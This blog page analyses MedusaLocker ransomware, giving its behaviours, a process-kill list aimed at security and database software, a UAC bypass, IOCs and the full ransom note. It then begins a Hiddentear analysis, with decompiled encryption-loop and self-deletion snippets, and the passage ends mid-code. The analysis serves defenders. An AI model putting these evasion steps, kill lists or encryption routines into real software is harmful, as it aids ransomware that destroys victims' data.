<p>After digging around in Ghidra for a bit I found <strong>FUN_00405bc0</strong> which seems to be the main program routine of MedusaLocker. The strings shown here match the output in the debug console present in the second sample discussed below.</p>
<p><center><img alt="Ghidra Main Function" src="https://dissectingmalwa.re/img/medusa-func.png"></center></p>
<p></br></p>
<p>Yet another mysterious CLSID that I can't make sense of at the moment: {8761ABBD-7F85-42EE-B272-A76179687C63}. Search results referencing it are around since October 21st and might make tracking Medusa a bit easier.</p>
<p><center><img alt="Running and CLSID" src="https://dissectingmalwa.re/img/medusa_running.png"></center></p>
<p></br></p>
<p>Next up the Locker will "initialize the crypto module" which uses <a href="https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptgenkey">CryptGenKey</a> provided by WinCrypt to derive a keypair. I'll have a closer look at the encryption routine later.</p>
<p><center><img alt="Initialization of the crypto module" src="https://dissectingmalwa.re/img/medusa_crypterInit.png"></center></p>
<p></br></p>
<p>It will skip files with the following suffixes:</p>
<p><center><code>exe, dll, sys, ini, lnk, rdp, encrypted</code></center></p>
<p></br></p>
<p>As it is very popular with Ransomware to disable the Automatic Startup Repair and delete System Restore Points plus shadow copies Medusa will do so as well. After that it will also relanch <strong>LanmanWorkstation</strong> to ensure that mapped network drives are available.</p>
<p><center><img alt="Deletion of system backups and shadow copies" src="https://dissectingmalwa.re/img/medusa-backups.png"></center></p>
<p></br></p>
<p><center><img alt="Process Kill" src="https://dissectingmalwa.re/img/medusa-kill.png"></center></p>
<p></br></p>
<p>After the "Adding to Autoload" debug message it will rename itself to svchost.exe and add it's Registry Key to the System startup.</p>
<p><center><img alt="Pest Doctor" src="https://dissectingmalwa.re/img/medusa_startup.png"></center></p>
<p></br></p>
<p>MedusaLocker will try to terminate the following processes by their name. The List contains Security Software as well as Services commonly used in productive environments such as SQL or Webservers.</p>
<div class="highlight"><pre><span></span><span class="n">wrapper</span><span class="p">,</span> <span class="n">DefWatch</span><span class="p">,</span> <span class="n">ccEvtMgr</span><span class="p">,</span> <span class="n">ccSetMgr</span><span class="p">,</span> <span class="n">SavRoam</span><span class="p">,</span> <span class="n">sqlservr</span><span class="p">,</span> <span class="n">sqlagent</span><span class="p">,</span> <span class="n">sqladhlp</span><span class="p">,</span> <span class="n">Culserver</span><span class="p">,</span> <span class="n">RTVscan</span><span class="p">,</span> <span class="n">sqlbrowser</span><span class="p">,</span> <span class="n">SQLADHLP</span><span class="p">,</span>
<span class="n">QBIDPService</span><span class="p">,</span> <span class="n">Intuit</span><span class="p">.</span><span class="n">QuickBooks</span><span class="p">.</span><span class="n">FCS</span><span class="p">,</span> <span class="n">QBCFMonitorService</span><span class="p">,</span> <span class="n">sqlwriter</span><span class="p">,</span> <span class="n">msmdsrv</span><span class="p">,</span> <span class="n">tomcat6</span><span class="p">,</span> <span class="n">zhudongfangyu</span><span class="p">,</span> <span class="n">SQLADHLP</span><span class="p">,</span>
<span class="n">vmware</span><span class="o">-</span><span class="n">usbarbitator64</span><span class="p">,</span> <span class="n">vmware</span><span class="o">-</span><span class="n">converter</span><span class="p">,</span> <span class="n">dbsrv12</span><span class="p">,</span> <span class="n">dbeng8wxServer</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">wxServerView</span><span class="p">,</span> <span class="n">sqlservr</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">sqlmangr</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span>
<span class="n">RAgui</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">supervise</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">Culture</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">RTVscan</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">Defwatch</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">sqlbrowser</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">winword</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">QBW32</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">QBDBMgr</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span>
<span class="n">qbupdate</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">QBCFMonitorService</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">axlbridge</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">QBIDPService</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">httpd</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">fdlauncher</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">MsDtSrvr</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span>
<span class="n">tomcat6</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">java</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="mi">360</span><span class="n">se</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="mi">360</span><span class="n">doctor</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">wdswfsafe</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">fdlauncher</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">fdhost</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">GDscan</span><span class="p">.</span><span class="n">exe</span><span class="p">,</span> <span class="n">ZhuDongFangYu</span><span class="p">.</span><span class="n">exe</span>
</pre></div>
<p></br></p>
<p>It also copies itself to %APPDATA% after renaming to executable to "svchostt.exe".</p>
<p><center><img alt="Copy of the executable in Appdata" src="https://dissectingmalwa.re/img/medusa-appdata.png"></center></p>
<p></br></p>
<p>To check if an instance of MedusaLocker previously ran on the system it will create a Registry Key at <code>HKEY_CURRENT_USER\Software\Medusa</code></p>
<p><center><img alt="Pest Doctor" src="https://dissectingmalwa.re/img/medusa-medrec.png"></center></p>
<p></br></p>
<p>Furthermore it tries to read the State of EnableLinkedConnections via <strong>RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" ...</strong> and enables the key if necessary since Medusa tries to encrypt Shared Network Drives and removeable Media as well.</p>
<p><center><img alt="Pest Doctor" src="https://dissectingmalwa.re/img/medusa-reg1.png"></center></p>
<p></br></p>
<p>After terminating the encryption loop the Ransomware will wait for 60 seconds and start a new scan to check for new unencrypted files.</p>
<p><center><img alt="Pest Doctor" src="https://dissectingmalwa.re/img/medusa-sleep.png"></center></p>
<p></br></p>
<p>Running MedusaLocker in a VM yields us this UAC Prompt with a mysterious CLSID (<em>{3E5FC7F9-9A51-4367-9063-A120244FBEC7}</em>). A quick google search brings us to Wikileaks Page for the <a href="https://wikileaks.org/ciav7p1/cms/page_13762807.html">CIA Vault7 leaks</a> and the ID seems to be corresponding to <em>cmstplua.dll</em>. Turns out this is an UAC bypass known and implemented since August 2017 (mentioned <a href="https://twitter.com/hfiref0x/status/897662607544508417">here</a>).</p>
<p><center><img alt="Pest Doctor" src="https://dissectingmalwa.re/img/medusa-uac0.png"></center></p>
<p></br></p>
<p>The Ransomnote (which is dropped in every directory that contains files to encrypt) is delivered as a HTML file. In this early sample they seem to have messed up their text alignment. This was fixed in a later version (see below) and will make it easier to identify new samples as they may appear. </p>
<p><center><img alt="Original Ransomnote" src="https://dissectingmalwa.re/img/medusa-note0.png"></center></p>
<p></br></p>
<p>Looking at the section list compared to the </p>
<p><center><img alt="Pest Doctor" src="https://dissectingmalwa.re/img/medusa-entropy2.png"></center></p>
<p></br></p>
<p>This sample seems to have an enabled debug console which allows us to trace the steps of the infection.</p>
<p><center><img alt="Debug Console" src="https://dissectingmalwa.re/img/medusa-console.png"></center></p>
<p></br></p>
<p>Below you can see the new ransomnote. The Protonmail E-Mail address was exchanged for a cock.li one and the Victim ID blob was fitted to the textbox.</p>
<p><center><img alt="Ransomnote" src="https://dissectingmalwa.re/img/medusa-note.png"></center></p>
<p></br></p>
<p>BleepingComputer Forum User ttrifonov who was hit by the ransomware as well found suspicious files on his Desktop after the Infection took place. Fortunately for us Medusa skipped the executables.</p>
<p><center><img alt="Comment on BleepingCmputer" src="https://dissectingmalwa.re/img/medusa-bleep.png"></center></p>
<p></br></p>
<p>This would be a huge discovery infection vector-wise as this looks like the attacker gained access to the machine via RDP. (Yet another proof [if we would need any] that RDP exposed to the internet isn't a good idea)</p>
<p><center><img alt="Pest Doctor" src="https://dissectingmalwa.re/img/medusa-desktop.png"></center></p>
<p></br></p>
<p>Looks like the attacker left a few files related to Mimikatz as well...</p>
<p><center><img alt="Key Generation" src="https://dissectingmalwa.re/img/medusa-kami.png"></center></p>
<p></br></p>
<p>As I mentioned earlier the keypair is generated via CryptGenKey. I'm still trying to map out all the actions on the key material.</p>
<p><center><img alt="Key Generation" src="https://dissectingmalwa.re/img/medusa-genKey.png"></center></p>
<p></br></p>
<p>The encryption itself is done via the <a href="https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptencrypt">CryptEncrypt</a> function. It seems to use AES for the files and then encrypts the key with a RSA-2048 public key that is stored via a keyblob in the executable.</p>
<p></br></p>
<p><center><img alt="Encryption Routine" src="https://dissectingmalwa.re/img/medusa-rsa.png"></center></p>
<p></br></p>
<p><center><img alt="Encryption Routine" src="https://dissectingmalwa.re/img/medusa-cryptenc.png"></center></p>
<p></br></p>
<p>After the encryption routine is done the generated hKey is deleted via <a href="https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptdestroykey">CryptDestroyKey</a>.</p>
<p><center><img alt="Key Deletion" src="https://dissectingmalwa.re/img/medusa-destroyKey.png"></center></p>
<p></br></p>
<h2><strong>Update 23.11.2019:</strong></h2>
<p>Now I want to take a closer look at the files left by the attacker on the Victim's Desktop as it was reported multiple times on the BleepingComputer Forum. Besides the Mimikatz files in the kamikadze directory there is a semi-legit tool called "<strong>Advanced Port Scanner</strong>" (<a href="https://app.any.run/tasks/727e8b8d-48ee-40cb-9c19-171ed5c32431">AnyRun</a>, which is basically just a garbage Zenmap alternative for Windows people) and another one called "<strong>NetworkShare.exe</strong>" (<a href="https://app.any.run/tasks/bfa0580d-7e16-4ea0-ab44-685f62ab9bd5">AnyRun</a>, seems to scan for reachable network shares and tries to mount them).</p>
<p><center><img alt="Networkshare Discovery Tool" src="https://dissectingmalwa.re/img/medusa-networkshare.png"></center></p>
<p></br></p>
<p>It also looks like there's a dedicated version of MedusaLocker for Windows XP called <em>dix_16_xp.exe</em>. As you can see below the Debug Messages start with <strong>[LockerXP]</strong> instead of <strong>[Locker]</strong>.</p>
<p><center><img alt="The XP Version of MedusaLocker" src="https://dissectingmalwa.re/img/medusa-lockerxp.png"></center></p>
<p></br></p>
<h3><strong>The Decryptor</strong> π§</h3>
<p>The Decryptor is delivered per Machine with a 4 letter filename indicating to which victim ID it belongs. </p>
<p><center><img alt="SSDEEP Hashes of the decryptor samples" src="https://dissectingmalwa.re/img/medusa-decList.png"></center></p>
<p></br></p>
<p><center><img alt="CLI of the Deryptor" src="https://dissectingmalwa.re/img/medusa-decryptor.png"></center></p>
<p></br></p>
<p><center><img alt="Imports listed in PEBear" src="https://dissectingmalwa.re/img/medusa-decImports.png"></center></p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Medusa (SHA256)</h3>
<div class="highlight"><pre><span></span><span class="n">medusa</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: 3a5b015655f3aad4b4fd647aa34fda4ce784d75a20d12a73f8dc0e0d866e7e01</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">12288</span><span class="p">:</span><span class="n">f</span><span class="o">+</span><span class="n">IZ</span><span class="o">+</span><span class="n">bobAyYFJPrsU4VwryxjpBx8ajiOhA8tsV1YRbRb7</span><span class="p">:</span><span class="mi">2</span><span class="o">++</span><span class="n">EMyYFJPoUecOh8aWdD1UB7</span>
<span class="n">dix_16</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: 49da42d00cc3ad6379ead2e07fd5f09bd358b144a6e78aad4bb1a8298e2bb568</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">24576</span><span class="p">:</span><span class="n">nJC1YAOp0eRaNaQgxPubcoiukAby3LV1jqjx9</span><span class="o">/</span><span class="n">WBRQ</span><span class="o">/</span><span class="mi">8</span><span class="n">PxS</span><span class="o">//</span><span class="n">lTQKJfF27</span><span class="p">:</span><span class="n">nw1OfMGxRoiuWZ1jUx9qrS3lsC27</span>
<span class="n">dix_16_xp</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: 6c7eda3f5e9bbc685b0eefde2a51f0ccb06ad33805e617876a5124410cac9945</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">24576</span><span class="p">:</span><span class="n">Sx7USQ2bEdBF4XUCAdbpH7KYlvnIVGDDUWuXrO0VY</span><span class="o">/</span><span class="n">QjFdIkyoRn</span><span class="p">:</span><span class="n">MISXu5C47KMIaDWVY</span><span class="o">/</span><span class="n">QZdjpB</span>
</pre></div>
<h3>E-Mail Addresses</h3>
<div class="highlight"><pre><span></span><span class="n">Ctorsenoria</span><span class="nv">@tutanota</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">Folieloi</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">mrromber</span><span class="nv">@cock</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">li</span><span class="w"></span>
<span class="n">mrromber</span><span class="nv">@tutanota</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">sambolero</span><span class="nv">@tutanoa</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">rightcheck</span><span class="nv">@cock</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">li</span><span class="w"> </span>
<span class="n">fartcool</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">ch</span><span class="w"></span>
<span class="n">bestcool</span><span class="nv">@keemail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">me</span><span class="w"></span>
<span class="n">tanoss</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">sypress</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
</pre></div>
<h3>Associated Files</h3>
<div class="highlight"><pre><span></span><span class="n">svchostt</span><span class="p">.</span><span class="n">exe</span>
<span class="n">HOW_TO_OPEN_FILES</span><span class="p">.</span><span class="n">html</span>
<span class="n">Advanced</span> <span class="n">Port</span> <span class="n">Scanner</span> <span class="mi">2</span><span class="p">.</span><span class="mi">4</span><span class="p">.</span><span class="mi">2750</span><span class="p">.</span><span class="n">exe</span>
<span class="n">d_upd1008</span><span class="p">.</span><span class="n">exe</span>
<span class="n">NetworkShare_pre2</span><span class="p">.</span><span class="n">exe</span>
<span class="n">PsExec64</span><span class="p">.</span><span class="n">exe</span> <span class="p">(</span><span class="n">legitimate</span><span class="p">)</span>
<span class="n">PsExec</span><span class="p">.</span><span class="n">exe</span> <span class="p">(</span><span class="n">legitimate</span><span class="p">)</span>
<span class="n">b</span><span class="p">.</span><span class="n">bat</span>
<span class="n">NetworkShare</span><span class="p">.</span><span class="n">exe</span>
<span class="n">kamikadze</span><span class="o">/</span><span class="mi">32</span><span class="p">.</span><span class="n">exe</span>
<span class="n">kamikadze</span><span class="o">/</span><span class="mi">64</span><span class="p">.</span><span class="n">exe</span>
<span class="n">kamikadze</span><span class="o">/</span><span class="mi">64</span><span class="n">_log</span><span class="p">.</span><span class="n">txt</span>
<span class="n">kamikadze</span><span class="o">/</span><span class="n">dump</span><span class="p">.</span><span class="n">bat</span>
<span class="n">kamikadze</span><span class="o">/</span><span class="n">mimidrv</span> <span class="p">(</span><span class="mi">2</span><span class="p">).</span><span class="n">sys</span>
<span class="n">kamikadze</span><span class="o">/</span><span class="n">mimilib</span> <span class="p">(</span><span class="mi">2</span><span class="p">).</span><span class="n">dll</span>
<span class="n">kamikadze</span><span class="o">/</span><span class="mi">86</span><span class="n">_log</span><span class="p">.</span><span class="n">txt</span>
<span class="n">kamikadze</span><span class="o">/</span><span class="n">mimidrv</span><span class="p">.</span><span class="n">sys</span>
<span class="n">kamikadze</span><span class="o">/</span><span class="n">mimilib</span><span class="p">.</span><span class="n">dll</span>
</pre></div>
<h3>Registry Keys</h3>
<div class="highlight"><pre><span></span><span class="n">HKCU</span><span class="err">\</span><span class="n">SOFTWARE</span><span class="err">\</span><span class="n">Medusa</span>
<span class="n">HKLM</span><span class="err">\</span><span class="n">SOFTWARE</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="n">Policies</span><span class="err">\</span><span class="k">System</span><span class="err">\</span> <span class="c1">--> EnableLinkedConnections = 1</span>
<span class="n">HKEY_LOCAL_MACHINE</span><span class="err">\</span><span class="n">SOFTWARE</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="n">Policies</span><span class="err">\</span><span class="k">System</span> <span class="c1">--> ConsentPromptBehaviorAdmin = 5</span>
<span class="n">HKEY_LOCAL_MACHINE</span><span class="err">\</span><span class="n">SOFTWARE</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="n">Policies</span><span class="err">\</span><span class="k">System</span> <span class="c1">--> EnableLUA = 1</span>
</pre></div>
<h3>Ransomnote</h3>
<div class="highlight"><pre><span></span><span class="nv">All</span> <span class="nv">your</span> <span class="nv">data</span> <span class="nv">are</span> <span class="nv">encrypted</span><span class="o">!</span>
<span class="nv">What</span> <span class="nv">happened</span>?
<span class="nv">Your</span> <span class="nv">files</span> <span class="nv">are</span> <span class="nv">encrypted</span>, <span class="nv">and</span> <span class="nv">currently</span> <span class="nv">unavailable</span>.
<span class="nv">You</span> <span class="nv">can</span> <span class="nv">check</span> <span class="nv">it</span>: <span class="nv">all</span> <span class="nv">files</span> <span class="nv">on</span> <span class="nv">you</span> <span class="nv">computer</span> <span class="nv">has</span> <span class="nv">new</span> <span class="nv">expansion</span>.
<span class="nv">By</span> <span class="nv">the</span> <span class="nv">way</span>, <span class="nv">everything</span> <span class="nv">is</span> <span class="nv">possible</span> <span class="nv">to</span> <span class="nv">recover</span> <span class="ss">(</span><span class="nv">restore</span><span class="ss">)</span>, <span class="nv">but</span> <span class="nv">you</span> <span class="nv">need</span> <span class="nv">to</span> <span class="nv">buy</span> <span class="nv">a</span> <span class="nv">unique</span> <span class="nv">decryptor</span>.
<span class="nv">Otherwise</span>, <span class="nv">you</span> <span class="nv">never</span> <span class="nv">cant</span> <span class="k">return</span> <span class="nv">your</span> <span class="nv">data</span>.
<span class="k">For</span> <span class="nv">purchasing</span> <span class="nv">a</span> <span class="nv">decryptor</span> <span class="nv">contact</span> <span class="nv">us</span> <span class="nv">by</span> <span class="nv">email</span>:
<span class="nv">mrromber</span>@<span class="nv">cock</span>.<span class="nv">li</span>
<span class="k">If</span> <span class="nv">you</span> <span class="nv">will</span> <span class="nv">get</span> <span class="nv">no</span> <span class="nv">answer</span> <span class="nv">within</span> <span class="mi">24</span> <span class="nv">hours</span> <span class="nv">contact</span> <span class="nv">us</span> <span class="nv">by</span> <span class="nv">our</span> <span class="nv">alternate</span> <span class="nv">emails</span>:
<span class="nv">mrromber</span>@<span class="nv">tutanota</span>.<span class="nv">com</span>
<span class="nv">What</span> <span class="nv">guarantees</span>?
<span class="nv">Its</span> <span class="nv">just</span> <span class="nv">a</span> <span class="nv">business</span>. <span class="k">If</span> <span class="nv">we</span> <span class="k">do</span> <span class="nv">not</span> <span class="k">do</span> <span class="nv">our</span> <span class="nv">work</span> <span class="nv">and</span> <span class="nv">liabilities</span> <span class="o">-</span> <span class="nv">nobody</span> <span class="nv">will</span> <span class="nv">not</span> <span class="nv">cooperate</span> <span class="nv">with</span> <span class="nv">us</span>.
<span class="nv">To</span> <span class="nv">verify</span> <span class="nv">the</span> <span class="nv">possibility</span> <span class="nv">of</span> <span class="nv">the</span> <span class="nv">recovery</span> <span class="nv">of</span> <span class="nv">your</span> <span class="nv">files</span> <span class="nv">we</span> <span class="nv">can</span> <span class="nv">decrypted</span> <span class="mi">1</span> <span class="nv">file</span> <span class="k">for</span> <span class="nv">free</span>.
<span class="nv">Attach</span> <span class="mi">1</span> <span class="nv">file</span> <span class="nv">to</span> <span class="nv">the</span> <span class="nv">letter</span> <span class="ss">(</span><span class="nv">no</span> <span class="nv">more</span> <span class="nv">than</span> <span class="mi">10</span><span class="nv">Mb</span><span class="ss">)</span>. <span class="nv">Indicate</span> <span class="nv">your</span> <span class="nv">personal</span> <span class="nv">ID</span> <span class="nv">on</span> <span class="nv">the</span> <span class="nv">letter</span>:
<span class="mi">54</span><span class="nv">E87CD3C1529DD06EB22FF80C49B5374ABB8E5B30D06E13BBE2E81411234A20DF1ADA53FDA68BD6294C96DAC3049B4BDC502706C0265B666946CD5ACB9E07D4</span>
<span class="nv">FE764BF468AF1A029B41162759D6164EB0652E95D3FAE3939773B505073E6090079C9C9243EE8B96AEB41A43B787B47DD01D7E192CEA0FB4FF72B5B6306C</span>
<span class="mi">425</span><span class="nv">E042C6CBDE89BB5F2E7F9CC6601BD9430E87B42A56BEEFF207F20F9E4E5E48FA3274AE0DE8D65EEC0F2BA2CC4AECB22A9E80DC26BA84A849794E54B67</span>
<span class="mi">6</span><span class="nv">FD2B21FF152A6A11BD86D063A965C1571078A439C97D52215738104F7B6EF7415CC4A2C03260BCB9A84E71E0883268747743893B2C334A38F9BCD34E5F9</span>
<span class="mi">39</span><span class="nv">CFF3002697B8AD04E01A6B6DC0A460F4273778429962A7AEECEE3BA16A577A6B1D6B67A7FAEFA5C9CB8BBCEFEDC3FF6B04E9FE1904B0EBCBC6B21719EB</span>
<span class="nv">BE5D37B69B42BBEE2EA0D00C7439858D2D9BD4A57B47F3E05EBF913F5FAB195AF0575DD345E84347A82010CDC4C0507C98687242FA147930BE75A4A14220</span>
<span class="nv">C61ED4091E4155585A687EAB73CBEA8ADA7B93B5EB67877CDD0E35C9116B8DCADD2038C4EEAC42302F3B787E54F8AD24012E4EB4D5A28F48C2450DD346C0</span>
<span class="nv">A89B3C32252BD438399FAE630A1E099E9D130E7EA7E042841B468FF00FCF86B9C07C054827EE76956211CE70FEB686EC19971816936EBF2F143F4C98F8B3</span>
<span class="mi">34</span><span class="nv">C96D1D35DD713CA33774C4D5D0</span>
<span class="nv">Attention</span><span class="o">!</span>
<span class="o">-</span> <span class="nv">Attempts</span> <span class="nv">of</span> <span class="nv">change</span> <span class="nv">files</span> <span class="nv">by</span> <span class="nv">yourself</span> <span class="nv">will</span> <span class="nb">result</span> <span class="nv">in</span> <span class="nv">a</span> <span class="nv">loose</span> <span class="nv">of</span> <span class="nv">data</span>.
<span class="o">-</span> <span class="nv">Our</span> <span class="nv">e</span><span class="o">-</span><span class="nv">mail</span> <span class="nv">can</span> <span class="nv">be</span> <span class="nv">blocked</span> <span class="nv">over</span> <span class="nv">time</span>. <span class="nv">Write</span> <span class="nv">now</span>, <span class="nv">loss</span> <span class="nv">of</span> <span class="nv">contact</span> <span class="nv">with</span> <span class="nv">us</span> <span class="nv">will</span> <span class="nb">result</span> <span class="nv">in</span> <span class="nv">a</span> <span class="nv">loose</span> <span class="nv">of</span> <span class="nv">data</span>.
<span class="o">-</span> <span class="nv">Use</span> <span class="nv">any</span> <span class="nv">third</span> <span class="nv">party</span> <span class="nv">software</span> <span class="k">for</span> <span class="nv">restoring</span> <span class="nv">your</span> <span class="nv">data</span> <span class="nv">or</span> <span class="nv">antivirus</span> <span class="nv">solutions</span> <span class="nv">will</span> <span class="nb">result</span> <span class="nv">in</span> <span class="nv">a</span> <span class="nv">loose</span> <span class="nv">of</span> <span class="nv">data</span>.
<span class="o">-</span> <span class="nv">Decryptors</span> <span class="nv">of</span> <span class="nv">other</span> <span class="nv">users</span> <span class="nv">are</span> <span class="nv">unique</span> <span class="nv">and</span> <span class="nv">will</span> <span class="nv">not</span> <span class="nv">fit</span> <span class="nv">your</span> <span class="nv">files</span> <span class="nv">and</span> <span class="nv">use</span> <span class="nv">of</span> <span class="nv">those</span> <span class="nv">will</span> <span class="nb">result</span> <span class="nv">in</span> <span class="nv">a</span> <span class="nv">loose</span> <span class="nv">of</span> <span class="nv">data</span>.
<span class="o">-</span> <span class="k">If</span> <span class="nv">you</span> <span class="nv">will</span> <span class="nv">not</span> <span class="nv">cooperate</span> <span class="nv">with</span> <span class="nv">our</span> <span class="nv">service</span> <span class="o">-</span> <span class="k">for</span> <span class="nv">us</span>, <span class="nv">its</span> <span class="nv">does</span> <span class="nv">not</span> <span class="nv">matter</span>. <span class="nv">But</span> <span class="nv">you</span> <span class="nv">will</span> <span class="nv">lose</span> <span class="nv">your</span> <span class="nv">time</span> <span class="nv">and</span> <span class="nv">data</span>, <span class="nv">cause</span> <span class="nv">just</span> <span class="nv">we</span> <span class="nv">have</span> <span class="nv">the</span> <span class="nv">private</span> <span class="nv">key</span>.
</pre></div>
<p></br></p>
<p>Medusa Icon made by Freepik from www.flaticon.com</p>Earn-quick-BTC-with-Hiddentear.mp4 / About Open Source Ransomware2019-10-26T00:00:00+02:002019-10-26T00:00:00+02:00f0wLtag:dissectingmalwa.re,2019-10-26:/earn-quick-btc-with-hiddentearmp4-about-open-source-ransomware.html<p>No, this will not be a skiddy Tutorial on how to earn quick crypto but rather an analysis of the Open Source Ransomware "Hiddentear".</p><p><center><img alt="Hiddentear Hoodie" src="https://dissectingmalwa.re/img/hiddentear-cleansc.png"></center></p>
<p></br></p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>"Shade Ransomware creater is stupid fxxxxx.exe" @ <a href="https://app.any.run/tasks/cea41d5c-84c5-43a7-93a3-b3881221d80d/">Any.Run</a>
--> <code>sha256 ba978eee90be06b1ce303bbee33c680c2779fbbc5b90c83f0674d6989564a70a</code></p>
<p></br></p>
<p><center><div class="github-card" data-github="goliate/hidden-tear" data-width="400" data-height="" data-theme="default"></div>
<script src="//cdn.jsdelivr.net/github-cards/latest/widget.js"></script></center></p>
<p></br></p>
<p>Because HiddenCrypt is Written in C# utilizing the .NET Framework 4 static analysis of the Binary will happen in <a href="https://www.telerik.com/products/decompiler.aspx">Progress Telerik JustDecompile</a> and <a href="https://github.com/0xd4d/dnSpy">dnspy</a>. With over 370 Forks and about as many stars on Github at the time of writing this, Hiddentear is the arguably the most popular open source Windows Ransomware on the platform.</p>
<p></br></p>
<p><center><img alt="Hiddentear Github" src="https://dissectingmalwa.re/img/hiddentear-git.png"></center></p>
<p></br></p>
<p>The original Ransomnote that is dropped to the Desktop by Hiddentear:</p>
<p><center><img alt="Hiddentear original Ransomnote" src="https://dissectingmalwa.re/img/hiddentear-msg.png"></center></p>
<p></br></p>
<p>It uses the RijndaelManaged class implemented in <em>System.Security.Cryptography</em> for the file encryption routine (which is just a fancy way of saying, that victim data is encrypted with AES-256-CBC :D).</p>
<p><center><img alt="Hiddentear AES Routine" src="https://dissectingmalwa.re/img/hiddentear-rijndael.png"></center></p>
<p></br></p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/hiddentear-plaindie.png"></center></p>
<p></br></p>
<p>By default Hidden Tear will only spare Folders named <em>Windows</em>, <em>Program Files</em> and <em>Program Files (x86)</em> and encrypt the contents of every Directory that doesn't match this condition.</p>
<div class="highlight"><pre><span></span><span class="k">if</span> <span class="ss">(</span><span class="o">!</span><span class="nv">directories</span>[<span class="nv">j</span>].<span class="nv">Contains</span><span class="ss">(</span><span class="s2">"</span><span class="s">Windows</span><span class="s2">"</span><span class="ss">)</span> <span class="o">&&</span> <span class="o">!</span><span class="nv">directories</span>[<span class="nv">j</span>].<span class="nv">Contains</span><span class="ss">(</span><span class="s2">"</span><span class="s">Program Files</span><span class="s2">"</span><span class="ss">)</span> <span class="o">&&</span> <span class="o">!</span><span class="nv">directories</span>[<span class="nv">j</span>].<span class="nv">Contains</span><span class="ss">(</span><span class="s2">"</span><span class="s">Program Files (x86)</span><span class="s2">"</span><span class="ss">))</span>
{
<span class="nv">this</span>.<span class="nv">encryptDirectory</span><span class="ss">(</span><span class="nv">directories</span>[<span class="nv">j</span>], <span class="nv">password</span><span class="ss">)</span><span class="c1">;</span>
<span class="nv">this</span>.<span class="nv">messageCreator</span><span class="ss">(</span><span class="nv">directories</span>[<span class="nv">j</span>]<span class="ss">)</span><span class="c1">;</span>
}
</pre></div>
<p></br></p>
<p>Another common mechanism to disrupt detection and analysis is a self deletion routine. After a timeout to ensure a completed execution it will just remove itself via the <em>Del</em> argument.</p>
<div class="highlight"><pre><span></span><span class="k">public</span> <span class="n">void</span> <span class="n">selfDestroy</span><span class="p">()</span>
<span class="err">{</span>
<span class="n">ProcessStartInfo</span> <span class="n">processStartInfo</span> <span class="o">=</span> <span class="k">new</span> <span class="n">ProcessStartInfo</span><span class="p">()</span>
<span class="err">{</span>
